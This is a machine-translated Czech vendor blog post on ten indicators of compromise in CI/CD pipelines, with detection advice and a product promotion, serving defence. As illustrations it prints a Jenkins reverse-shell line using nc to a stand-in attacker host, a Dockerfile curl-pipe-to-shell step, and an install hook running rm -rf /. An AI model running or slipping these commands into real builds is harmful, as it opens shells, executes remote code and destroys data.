10 nejdůležitějších ukazatelů kompromisu v CI/CD Pipelines

Úvod: Jaké jsou indikátory kompromitace v kybernetické bezpečnosti?

Indikátory kompromitace jsou prvními varovnými signály, že váš systém nebo pipeline může být pod útokem. Jednoduše řečeno, indikátory kompromisu jsou stopy zanechané útočníky, jako podivné logins, změny souborů nebo skrytý malware. V Kybernetická bezpečnost MOV, fungují jako otisky prstů na místě činu a poskytují vám jasný důkaz, že je něco v nepořádku. Proto když se vývojáři ptají jaké jsou ukazatele kompromisu, odpověď se neomezuje pouze na servery nebo firewally, ale zahrnuje i rizika skrytá v moderních CI/CD pipelines.

V těchto pipelineÚtočníci mohou manipulovat s kódem, vkládat škodlivé závislosti nebo měnit kroky sestavení, aniž by si toho byli všimnuti. Většina průvodců se však stále zaměřuje pouze na servery nebo sítě. V důsledku toho se dodavatelský řetězec softwaru stal jedním z nejjednodušších cílů.

Proto je důležité najít indikátory kompromisu v CI/CD pipelines je nezbytný. Především pomáhá týmům blokovat malware, chránit tajemství a zabezpečit každý krok dodání softwaru.

10 nejdůležitějších ukazatelů kompromisu v CI/CD Pipelines

Při vysvětlování indikátorů kompromitace se většina seznamů zaměřuje na servery nebo sítě. Přesto v CI/CD pipelineÚtočníci zanechávají velmi odlišné otisky prstů. Rozpoznání těchto signálů je klíčové pro proaktivní obranu. Níže uvádíme 10 varovných signálů kybernetické bezpečnosti podle IOC, na které by si měl dát pozor každý vývojář a bezpečnostní inženýr.

1. Podezřelé změny závislostí

Jedním z hlavních ukazatelů kompromisu pipelines je náhlá a zvláštní aktualizace závislostí. Útočníci často zneužívají důvěry, kterou vývojáři vkládají do správců balíčků, k přidávání nebezpečných balíčků.

Například v npm a package.json diff může náhle zahrnovat:

Takové změny mohou vypadat bezpečně, ale mohou do každého sestavení vnést trojský kód.

Dopad: Napadené sestavení dědí malware u zdroje.

Detekce: vynucovat kontrolu závislostí, sledovat rozdíly v uzamčených souborech a neustále skenovat nové balíčky.

2. Zahalený kód v sestaveních 

Autoři malwaru se spoléhají na zamlžování, aby se vyhnuli kontrolám. V důsledku toho je tento indikátor kompromitace v CI/CD pipelines může být jedním z nejobtížněji odhalitelných. Ve skutečnosti se obfuskované datové části často bez upozornění dostanou do open source knihoven nebo kontejnerových obrazů.

Například:

  • Balíček PyPI používající base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • Obraz Dockeru nabitý nepotřebnými binárními soubory UPX.
  • JavaScript plný \x41\x42 uniká skrývajícím se zlodějům pověřovacích údajů.

Dopad: Skrytý kód se během sestavení nebo běhu spouští tiše, což z něj činí kritický signál v kybernetické bezpečnosti IOC.
Detekce: Kombinovat SAST s skenováním malwaru k označení zakódovaného nebo zabaleného kódu. Především berte obfuskaci jako varovný signál, který si zaslouží další prošetření.

3. Odhalená tajemství Gitu: Klasické kybernetické riziko IOC

CI/CD pipelineČasto dědí tajné kódy přímo z repozitářů. Nicméně když se v Gitu objeví tajné kódy, stávají se jednou z nejjasnějších odpovědí na otázku „jaké jsou ukazatele kompromisu v pipeline„Jakmile se přihlašovací údaje dostanou do Gitu, útočníci je mohou zneužívat donekonečna.

Například:

  • A .env soubor obsahující AWS_SECRET_KEY=.
  • Vložené žetony config.json.
  • Tajemství jsou stále viditelná v historii Gitu i po odstranění.

Dopad: Odhalené klíče poskytují útočníkům přímý přístup k CI/CD pipelines, cloudové systémy nebo databáze. Toto je proto jeden z nejnebezpečnějších indikátorů kompromitace.
Detekce: Použijte pre-commit hooks a úlohy CI pro tajné skenování a okamžitě odvolat uniklé klíče. Dále vynutit automatickou nápravu pro zkrácení doby expozice.

4. Zmanipulováno Pipeline Konfigurace: Skryté indikátory kompromitace

Pipeline konfigurace jsou cíle s vysokou hodnotou, protože Jediná úprava často naruší celý pracovní postupV důsledku toho bylo manipulováno pipeline Soubory představují hlavní kybernetické riziko pro IOC, které tradiční monitorovací nástroje jen zřídka odhalí.

Například:

  • V akcích GitHubu:

  • V GitLabu: přidána škodlivá úloha .gitlab-ci.yml která ukládá citlivá data.
  • V Jenkinsovi: sh "nc -e /bin/bash attacker.com 4444".

Dopad: Tyto neschválené změny vás pipeline do permanentních zadních vrátek pro útočníky, což se jasně počítá jako indikátor kompromitace.
Detekce: Vynucovat podepsané konfigurace, vyžadovat schválení PR a monitorovat neočekávané úlohy. Kromě toho nastavit guardrails které automaticky blokují změněné pracovní postupy.

5. Privileged IaC Výchozí 

Nesprávně nakonfigurované definice infrastruktury často vytvářejí skryté zadní vrátka. V důsledku toho se privilegovaná výchozí nastavení v IaC jsou klasickým kybernetickým rizikem MOV.

Například:

  • Nasazení Kubernetes pro udělování podů privileged: true.
  • Helmovy grafy odhalující služby s 0.0.0.0:22.

Dopad: Útočníci získají přístup na úrovni root nebo veřejně zpřístupní interní služby. V důsledku toho tyto problémy výrazně rozšiřují oblast útoku.
Detekce: Přihláška IaC skenování pro vynucení co nejnižších oprávnění před sloučením. Dále zajistěte, aby každá konfigurace byla zkontrolována jako součást pipeline.

6. Neobvyklé chování při sestavení 

Útočníci často mění pipeline chování, které by mohlo vkrádat škodlivé akce. Jinými slovy, neobvyklá aktivita sestavení je jednou z nejjasnějších odpovědí na to, co jsou indikátory kompromitace v CI/CD pipelines.

Například:

  • Sestavení odesílající odchozí síťové požadavky na cizí domény.
  • Projekt Node.js náhle spustil PowerShell během npm install.
  • Úloha CI stahuje velké binární soubory, které nejsou definovány ve skriptech sestavení.

Dopad: Napadené sestavení mohou fungovat jako distribuční body malwaru. Především šíří škodlivé datové části napříč každým nasazením.
Detekce: Sledujte protokoly sestavení, zda neobsahují neočekávané procesy nebo připojení. Dále nakonfigurujte detekci anomálií tak, aby signalizovala chování mimo normu.

7. Škodlivé skripty balíčků jako kybernetická rizika pro IOC

Správci balíčků podporují životní cyklus hooks které útočníci zneužívají. Škodlivé skripty v npm, PyPI nebo Dockerfiles jsou proto silnými indikátory kompromitace.

Například:

  • npm: postinstall spuštěný skript rm -rf / nebo navádění k C2.
  • PyPI: setup.py spuštění skrytého kódu Pythonu při instalaci.
  • Dockerfile: RUN curl attacker.sh | sh.

Dopad: Útok se provede během instalace, před jakýmkoli běhovým testováním. Vývojáři si ho proto nemusí všimnout, dokud není příliš pozdě.
Detekce: Prohledejte manifesty balíčků a vyhledejte instalační skripty. Kromě toho omezte rizikové hooks in CI/CD pracovní místa ke snížení expozice.

8. Indikátory kompromitace v registru

Útočníci nahrazují nebo upravují artefakty v registrech a tyto události jsou učebnicovými příklady toho, co jsou indikátory kompromitace v dodavatelském řetězci. pipelines.

Například:

  • Tag obrázku v Dockeru tiše aktualizovaný vrstvou napadenou trojským koněm.
  • Interní balíček nahrazen infikovanou verzí.
  • squatting jmenného prostoru npm, například lodash-proxy.

Dopad: Každé sestavení používající artefakt registru je ohroženo. Nejen to, ale ohrožení se šíří i do navazujících služeb.
Detekce: Vynucujte kontroly podpisů a integrity u všech stahovaných dat z registru. Kromě toho sledujte původ artefaktů pomocí SBOM validace.

9. Anomální aktivita uživatelů jako důkaz IOC

Kompromitované účty téměř vždy zanechávají abnormální stopy. Neobvyklé chování vývojářů je proto silným ukazatelem kompromitace.

Například:

  • Commits odsunuto ve 3 hodiny ráno místního času.
  • Schválení PR účtů na dovolené.
  • Pipelinespouštěny s neobvyklou frekvencí.

Dopad: Útočníci zneužívají ukradené přihlašovací údaje k vkládání škodlivých změn. Koneckonců, neoprávněné commitsnadno se začlení do běžných pracovních postupů.
Detekce: monitor SCM aktivitu pro anomálie, vynucovat vícefaktorovou autentizaci (MFA) a pravidelně rotovat tokeny. Kromě toho upozorňovat na podezřelé commit nebo vzorce schvalování.

10. Selhání kontrol integrity nebo podpisů v kybernetické bezpečnosti IOC

Běžný, ale ignorovaný indikátor kompromisu je neúspěšná kontrola integrity nebo podpisu. V kybernetické bezpečnosti IOC tyto kontroly ověřují, zda jsou kód nebo artefakty autentické. Jejich přeskakování ponechává pipelineje vystaven/a.

Příklady:

  • Haš SHA256 neodpovídá očekávanému kontrolnímu součtu.
  • Chybějící nebo neplatný podpis GPG.
  • An SBOM zobrazující nepodepsané artefakty.

Dopad: Selhání integrity často znamená neoprávněnou manipulaci, otravu registru nebo vniknutí malwaru.

Detekce: Automatizujte kontroly podpisů, vynucujte ověřování kontrolních součtů a blokujte nepodepsané komponenty. Především však každou neúspěšnou kontrolu považujte za jasný důkaz kompromitace.

CI/CD Ukazatele kompromisu v kostce

Indikátor kompromisu (MOV) Dopad na CI/CD Pipelines Jak zjistit
Podezřelé změny závislostí Útočníci vkládají škodlivé knihovny do správců balíčků, což vede k napadení sestavení. Sledujte rozdíly v souborech zámků, vynucujte kontrolu závislostí a průběžně skenujte závislosti.
Zahalený kód v sestaveních Skryté datové části se spouštějí během sestavení nebo běhu bez detekce. Použijte SAST a skenování malwaru pro označení vzorů kódu base64, hex nebo baleného kódu.
Odhalená tajemství v Gitu Uniklé tokeny nebo klíče API poskytují útočníkům přímý přístup ke kritickým systémům. Spuštění tajných skenů v Gitu hooks a automaticky zrušit uniklé přihlašovací údaje.
Zmanipulováno Pipeline Konfigurace Upravené pracovní postupy umožňují exfiltraci dat nebo jejich perzistenci uvnitř CI/CD. Vyžadovat schválení PR, vynucovat podepsané konfigurace a monitorovat pipeline Změny.
Privilegovaný IaC Výchozí Příliš tolerantní role nebo nezabezpečená výchozí nastavení vystavují cloudová prostředí riziku. Prohledejte soubory Terraform, Kubernetes a Helm, abyste zjistili, zda máte co nejnižší oprávnění.
Neobvyklé chování sestavení Pipelinepoužívají se jako distribuční body malwaru nebo pro laterální pohyb. Analyzujte protokoly sestavení a zjistěte, zda neobsahují neočekávaná stahování, procesy nebo odchozí volání.
Škodlivé skripty balíčků Skryté skripty před/po instalaci spouštějí datové části před testováním za běhu. Blokovat rizikové skripty npm/PyPI a omezit jejich spouštění v CI/CD pracovní místa.
Otrava registru Trojanizované artefakty nahrazují důvěryhodné obrazy nebo binární soubory v registrech. Ověřujte kontrolní součty, vynucujte ověření podpisů a proaktivně skenujte registry.
Anomální aktivita uživatelů Napadené účty šíří škodlivé commits nebo spouštěč pipelines. Vynucování vícefaktorové autentizace a monitorování commits pro anomálie a analyzovat login vzory.
Neúspěšné kontroly integrity nebo podpisu Označuje pozměněný kód, závislosti nebo obrázky vstupující do pipeline. Automatizujte kontroly integrity a blokujte nepodepsané nebo neshodné komponenty.

Proč tradiční kybernetická bezpečnost MOV selhává CI/CD rizika

Většina organizací již monitoruje indikátory kompromitace na serverech, počítačích nebo sítích. Tento klasický přístup ke kybernetické bezpečnosti IOC však ignoruje CI/CD pipelines, které jsou nyní jedním z nejkritičtějších útočných povrchů. Ve skutečnosti, pipelineukazují jedinečné signály kompromitace, které tradiční nástroje nedokážou detekovat.

Indikátory kompromisů v tradiční bezpečnosti

V konvenční kybernetické bezpečnosti IOC se obvykle zaměřuje na:

  • Neobvyklý loginnebo IP adresy, které naznačují odcizení přihlašovacích údajů.
  • Podezřelé haše souborů nebo změny v registru, které odhalují malware.
  • Neočekávaný odchozí provoz, který ukazuje na únik dat.

Jedná se o dobře známé ukazatele, které jsou také sledovány v Rámec MITRE ATT&CK, který mapuje běžné chování a taktiky protivníků. Jedná se o užitečné signály. Vztahují se však hlavně na operační systémy nebo podnikové sítě. V důsledku toho přehlížejí jemné zásahy, ke kterým dochází dříve v dodavatelském řetězci softwaru.

Proč CI/CD Pipelines jsou odlišné

CI/CD pipelinejsou automatizovaná prostředí, kde vývojáři commit kód, závislosti na stahování a vydané sestavení. Útočníci vědí, že jedno kompromitování se zde kaskádovitě šíří napříč každým nasazením. Jaké jsou tedy indikátory kompromitace v CI/CD pipelines? Vypadají velmi odlišně:

  • Škodlivá závislost tiše přidána do souboru package.json nebo requirements.txt.
  • Klíče nebo tokeny API zveřejněné v Gitu commitsoubory s příponou .env.
  • Zahalený kód vložený do balíčků npm nebo PyPI.
  • Soubory Terraformu nebo Kubernetes s nezabezpečenými výchozími hodnotami, jako je například privilegované: true.
  • Pipeline úlohy upravené za účelem odcizení dat nebo otevření zadních vrátek.

Tyto kompromisní signály v CI/CD zůstat neviditelný pro standard bezpečnostní nástroje.

Mezera v kybernetické bezpečnosti MOV

Přestože mnoho týmů chápe hodnotu indikátorů kompromitace, stále se spoléhají pouze na detekci ze serverů a síťových protokolů. Útočníci tak mohou otrávit sestavení nebo vložit malware, aniž by zanechali obvyklé stopy. Proto incidenty, jako je backdoor XZ Utils nebo škodlivé balíčky npm, zůstaly neodhaleny, dokud se nedostaly do produkčního prostředí.

Tyto druhy kompromisů v dodavatelském řetězci jsou také zdůrazněny CISPokyny společnosti A k zabezpečení dodavatelského řetězce, který varuje, že útočníci se stále častěji zaměřují CI/CD pipelinea registry.

Jídlo sebou

Tradiční kybernetická bezpečnost IOC je nezbytná, ale nestačí. Týmy musí především rozpoznávat indikátory kompromitace specifické pro danou oblast. CI/CD pipelines. Teprve potom mohou detekovat škodlivý kód nebo pipeline zneužívání dříve, než se rozšíří napříč prostředím.

nástroje pro analýzu složení softwaru SCA
Stanovte priority, opravte a zabezpečte svá softwarová rizika
Získejte svůj bezplatný účet.
Nevyžaduje se žádná kreditní karta.

Zajistěte si vývoj a dodávky softwaru

s produktovým balíčkem Xygeni